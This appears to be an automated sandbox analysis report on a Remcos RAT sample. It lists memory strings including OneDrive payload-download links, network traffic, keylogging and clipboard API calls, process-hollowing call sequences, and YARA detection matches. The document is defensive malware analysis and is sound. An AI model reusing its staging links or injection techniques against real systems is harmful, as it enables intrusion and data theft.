                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwre
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2Z
                    Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                    Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/5
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SndVol.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/downlo
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: SndVol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhv3259.tmp.4.drString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49722 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000003_2_0040A2B8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B70E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168C1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536758E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,3_2_0536758E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,4_2_0040987A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_00406DFC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,7_2_00406E9F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B70E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_0040A3E0

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041C9E2 SystemParametersInfoW,3_2_0041C9E2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536D6AF SystemParametersInfoW,3_2_0536D6AF

                    System Summary

                    barindex
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\SndVol.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0291C7B8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291A4DC GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadHugeReadPtr,IsBadHugeReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,0_2_0291A4DC
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_02917A74
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917924 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02917924
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02917CA8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02918170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02918170
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_0291816E
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0291C6D2
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0291C6D4
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_02917A72
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029179B8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,0_2_029179B8
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_02917922 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02917922
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_004180EF
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,3_2_004132D2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,3_2_0041BB09
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,3_2_0041BB35
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536C7D6 OpenProcess,NtSuspendProcess,CloseHandle,3_2_0536C7D6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536E25C NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,3_2_0536E25C
